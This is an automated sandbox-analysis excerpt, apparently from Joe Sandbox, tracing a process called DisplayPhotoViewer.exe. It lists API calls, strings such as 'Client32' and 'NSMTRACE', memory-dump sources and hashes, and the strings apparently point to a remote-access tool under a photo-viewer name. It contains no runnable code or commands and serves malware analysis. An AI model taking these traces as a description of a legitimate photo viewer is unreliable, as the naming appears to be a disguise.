                                                                                                      • Part of subcall function 11059E50: __wcstoi64.LIBCMT ref: 11059E8D
                                                                                                    • SetEvent.KERNEL32(00000C34,Client,DisableGeolocation,00000000,00000000,218EC38C,74DF2EE0,?,00000000,Function_0017A29B,000000FF,?,1102E7CB,Client,UseIPC,00000001), ref: 1102BAD7
                                                                                                      • Part of subcall function 111077A0: _malloc.LIBCMT ref: 111077B9
                                                                                                      • Part of subcall function 111077A0: wsprintfA.USER32 ref: 111077D4
                                                                                                      • Part of subcall function 111077A0: _memset.LIBCMT ref: 111077F7
                                                                                                      • Part of subcall function 111078A0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1110859D,00000000,00000001,?,?,?,?,?,1102F5F3), ref: 111078BE
                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102BA9A
                                                                                                    Strings
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
                                                                                                    • String ID: Client$DisableGeolocation
                                                                                                    • API String ID: 3315423714-4166767992
                                                                                                    • Opcode ID: e69fa41f11fcc5e579b4203668c7d4f63ce6f07d1d15be820b00a95ecdd96e07
                                                                                                    • Instruction ID: 504a91ac801fad8ffe14612fa14b8858fde6a0909de131ffa1e724ebb17bf2a2
                                                                                                    • Opcode Fuzzy Hash: e69fa41f11fcc5e579b4203668c7d4f63ce6f07d1d15be820b00a95ecdd96e07
                                                                                                    • Instruction Fuzzy Hash: CF217274B41761AFE711CFA4CC46B69B7A4E708B18F10426EE9615B3C0EBB56401CB94
                                                                                                    APIs
                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11025F2A
                                                                                                      • Part of subcall function 110C7250: EnterCriticalSection.KERNEL32(00000000,00000000,75BF3760,00000000,75C0A1D0,11059DFB,?,?,?,?,11025293,00000000,?,?,00000000), ref: 110C726B
                                                                                                      • Part of subcall function 110C7250: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110C7298
                                                                                                      • Part of subcall function 110C7250: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110C72AA
                                                                                                      • Part of subcall function 110C7250: LeaveCriticalSection.KERNEL32(?,?,?,?,11025293,00000000,?,?,00000000), ref: 110C72B4
                                                                                                    • TranslateMessage.USER32(?), ref: 11025F40
                                                                                                    • DispatchMessageA.USER32(?), ref: 11025F46
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                                                                    • String ID: Exit Msgloop, quit=%d
                                                                                                    • API String ID: 3212272093-2210386016
                                                                                                    • Opcode ID: cf26e9018ae4132122310db48b5282dc0ab3af1b892683448944b02675533e27
                                                                                                    • Instruction ID: d89c40251b6bfc8e70c3015f3d7383fd8c3cfab5e37f5722f073c655be436893
                                                                                                    • Opcode Fuzzy Hash: cf26e9018ae4132122310db48b5282dc0ab3af1b892683448944b02675533e27
                                                                                                    • Instruction Fuzzy Hash: A0F0C8B7E0121557C640DBD5ACC1FAFF37C9BC8608F804465EE15D3148E621B4058BA1
                                                                                                    APIs
                                                                                                    • GetCommandLineA.KERNEL32 ref: 07E21027
                                                                                                    • GetStartupInfoA.KERNEL32(?), ref: 07E2107B
                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,?), ref: 07E21096
                                                                                                    • ExitProcess.KERNEL32 ref: 07E210A3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3116856613.0000000007E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 07E20000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_7e20000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                                                    • String ID:
                                                                                                    • API String ID: 2164999147-0
                                                                                                    • Opcode ID: 0d8b40b86484847c175808b603f48bfba749d448f721e36594049b1950150f4f
                                                                                                    • Instruction ID: cef9564cfcd73b1be71ea83e532a5f06d267a67c67c21e0051595bee3c2880a1
                                                                                                    • Opcode Fuzzy Hash: 0d8b40b86484847c175808b603f48bfba749d448f721e36594049b1950150f4f
                                                                                                    • Instruction Fuzzy Hash: 431108F04063EE6AEB314E608449FEABF9A7F0238CF342044DDD596146C67646C7E365
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(11027F7F,?,1113A1E3,?), ref: 11139F9C
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe,00000104,?,1113A1E3,?), ref: 11139FB9
                                                                                                    Strings
                                                                                                    • C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe, xrefs: 11139FA4, 11139FB2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CurrentFileModuleNameProcess
                                                                                                    • String ID: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
                                                                                                    • API String ID: 2251294070-2359701382
                                                                                                    • Opcode ID: 3dbb660838f1bcf71a8df8c4176f8b31fd4322268f9bd3aff93e5a726e143a41
                                                                                                    • Instruction ID: 079cde17b882fc661c5cd1b0716c19d555b4d8b9dd1b7d0460bd42ff414687a1
                                                                                                    • Opcode Fuzzy Hash: 3dbb660838f1bcf71a8df8c4176f8b31fd4322268f9bd3aff93e5a726e143a41
                                                                                                    • Instruction Fuzzy Hash: C6112331B512169BE709DFE5D984B29FBD9ABC472AF00803CE849C76C8EB71E840C745
                                                                                                    APIs
                                                                                                    • _malloc.LIBCMT ref: 11107829
                                                                                                      • Part of subcall function 111583B1: __FF_MSGBANNER.LIBCMT ref: 111583CA
                                                                                                      • Part of subcall function 111583B1: __NMSG_WRITE.LIBCMT ref: 111583D1
                                                                                                      • Part of subcall function 111583B1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110782E,?,?,?,?,1113B312,?,?,?), ref: 111583F6
                                                                                                    • _memset.LIBCMT ref: 11107852
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocateErrorExitHeapLastMessageProcess_malloc_memsetwsprintf
                                                                                                    • String ID: ..\ctl32\Refcount.cpp
                                                                                                    • API String ID: 2803934178-2363596943
                                                                                                    • Opcode ID: 8f0fd21ade5106aebc5e12d8de822042e3c768cee8e55ef0a11524b63809a721
                                                                                                    • Instruction ID: 06c353a90772c29cefbbce5cdda557822b50b394f937f9b4c7d55122edf5e5ac
                                                                                                    • Opcode Fuzzy Hash: 8f0fd21ade5106aebc5e12d8de822042e3c768cee8e55ef0a11524b63809a721
                                                                                                    • Instruction Fuzzy Hash: 78E0C22BF8092533C1A120977D02FDFFA4C4BA29ADF040031FD0C66212E581B60581E2
                                                                                                    APIs
                                                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 111097CA
                                                                                                    • __wsplitpath.LIBCMT ref: 111097E5
                                                                                                      • Part of subcall function 1115E804: __splitpath_helper.LIBCMT ref: 1115E846
                                                                                                    • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 11109819
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
                                                                                                    • String ID:
                                                                                                    • API String ID: 1847508633-0
                                                                                                    • Opcode ID: 17b11c500efaa864637ee90d6cd031dca358ae21ff22c51b22de302bb99d8ba8
                                                                                                    • Instruction ID: cfcff6d08eced77461863aef3a19504d4271605eb2284c94472767243ec66a9a
                                                                                                    • Opcode Fuzzy Hash: 17b11c500efaa864637ee90d6cd031dca358ae21ff22c51b22de302bb99d8ba8
                                                                                                    • Instruction Fuzzy Hash: 5411C435A4020CBBEB14DF94CC42FECF374AF48B04F404098EA246B1C0E7B02A05CB66
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F0A64,00000030,11137B17,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 110996E1
                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,110F0A64,00000030,11137B17,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 110996E8
                                                                                                      • Part of subcall function 110995F0: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,00000001,0BA671C0,00000000), ref: 11099628
                                                                                                      • Part of subcall function 110995F0: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 11099644
                                                                                                      • Part of subcall function 110995F0: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,0796E970,0796E970,0796E970,0796E970,0796E970,0796E970,0796E970,111E2704,?,00000001,00000001), ref: 11099670
                                                                                                      • Part of subcall function 110995F0: EqualSid.ADVAPI32(?,0796E970,?,00000001,00000001), ref: 11099683
                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 11099707
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2256153495-0
                                                                                                    • Opcode ID: 60ba714ad3c18b440e077ee4a45bd34648daad3f6dd38bd845bb94ef82c7e924
                                                                                                    • Instruction ID: b3e42719bc7fdada53d275fe7c01c16cb20ff5fc8cb9c64d45f4be543a0a6106
                                                                                                    • Opcode Fuzzy Hash: 60ba714ad3c18b440e077ee4a45bd34648daad3f6dd38bd845bb94ef82c7e924
                                                                                                    • Instruction Fuzzy Hash: 12F0F874A11219ABCF14DFA5E8C895EF7AAAB08308B50847AEC19D3204FA31DA009F54
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(00000000,00000000), ref: 11064A12
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad
                                                                                                    • String ID: ??CTL32.DLL
                                                                                                    • API String ID: 1029625771-2984404022
                                                                                                    • Opcode ID: e10ec1178dd96e41399a91e4c8b3fa8f7e27920cc5c9d53088df5fcacf16577d
                                                                                                    • Instruction ID: edc831c9bac0710a2833f7ff5ed18347d73f9cc27f9899f53b7a2a43fc9132ba
                                                                                                    • Opcode Fuzzy Hash: e10ec1178dd96e41399a91e4c8b3fa8f7e27920cc5c9d53088df5fcacf16577d
                                                                                                    • Instruction Fuzzy Hash: 1831F572A04255EFD711CF19DC40B5AF7E8FB45324F0586A9ED18D7380E731A801CBA1
                                                                                                    APIs
                                                                                                    • GetDriveTypeA.KERNEL32(?), ref: 110258BD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: DriveType
                                                                                                    • String ID: ?:\
                                                                                                    • API String ID: 338552980-2533537817
                                                                                                    • Opcode ID: 268953c2f23033925898edad21c6d672c896577a9090c4bc1e377c4f4053fe1a
                                                                                                    • Instruction ID: d31342550d5cf5955897a0d199b4155fffd08261177713a46b1b6ae3021f9349
                                                                                                    • Opcode Fuzzy Hash: 268953c2f23033925898edad21c6d672c896577a9090c4bc1e377c4f4053fe1a
                                                                                                    • Instruction Fuzzy Hash: C9F02461C443D92AEB22DE60D4406C6BFD94F02269F54C8CED8DA52441F2F2E1888BA1
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(NSMTRACE,?,1102C724,110252D0,0BA6C1B8,?,?,?,00000100,?,?,00000009), ref: 1113C599
                                                                                                      • Part of subcall function 1113B8F0: GetModuleHandleA.KERNEL32(NSMTRACE,11189A50), ref: 1113B90A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: HandleLibraryLoadModule
                                                                                                    • String ID: NSMTRACE
                                                                                                    • API String ID: 4133054770-4175627554
                                                                                                    • Opcode ID: a2ffb72ffc09aaeacd28c67883b9a122d1ca7e81eddb3afb4529a25f7f236f93
                                                                                                    • Instruction ID: 408c1d615ebbab9f82e2bea2d554aa0f1c95d530934033219aae1b43a4083b8d
                                                                                                    • Opcode Fuzzy Hash: a2ffb72ffc09aaeacd28c67883b9a122d1ca7e81eddb3afb4529a25f7f236f93
                                                                                                    • Instruction Fuzzy Hash: BED012346912678AD7125ADAA590238FBD4B78432E300007AD916C2E48EB20D8008B19
                                                                                                    APIs
                                                                                                      • Part of subcall function 111077A0: _malloc.LIBCMT ref: 111077B9
                                                                                                      • Part of subcall function 111077A0: wsprintfA.USER32 ref: 111077D4
                                                                                                      • Part of subcall function 111077A0: _memset.LIBCMT ref: 111077F7
                                                                                                    • std::exception::exception.LIBCMT ref: 1105BDC3
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 1105BDD8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 1338273076-0
                                                                                                    • Opcode ID: 458f707eca7cc7dabb748e2a28a73304366b7ed7de3b855394f888a64eec1dd7
                                                                                                    • Instruction ID: a1dee9e6324aa9e5cf750fbb168aab0da4794815e51fdd4fd48c7d55def21bc5
                                                                                                    • Opcode Fuzzy Hash: 458f707eca7cc7dabb748e2a28a73304366b7ed7de3b855394f888a64eec1dd7
                                                                                                    • Instruction Fuzzy Hash: 5551A0B6A00609AFDB50CF54C840E9AFBEAEF89314F14855EE9199B340E771F900CBE1
                                                                                                    APIs
                                                                                                    • _memset.LIBCMT ref: 110706CF
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,11189201,0B2220C0), ref: 11070739
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary_memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 1654520187-0
                                                                                                    • Opcode ID: 5f9d4fded7a4aebe457466206f233a9b98f5644a516551f8f3b8d73233da3a6d
                                                                                                    • Instruction ID: b4517536591866d176506ab9d34d2c09925eccc7506cffdd9ee3597e20039527
                                                                                                    • Opcode Fuzzy Hash: 5f9d4fded7a4aebe457466206f233a9b98f5644a516551f8f3b8d73233da3a6d
                                                                                                    • Instruction Fuzzy Hash: 5321C576E00229A7D710DE54EC80BDFFBACFB89354F5042AAE90997240EB715E50CBE1
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
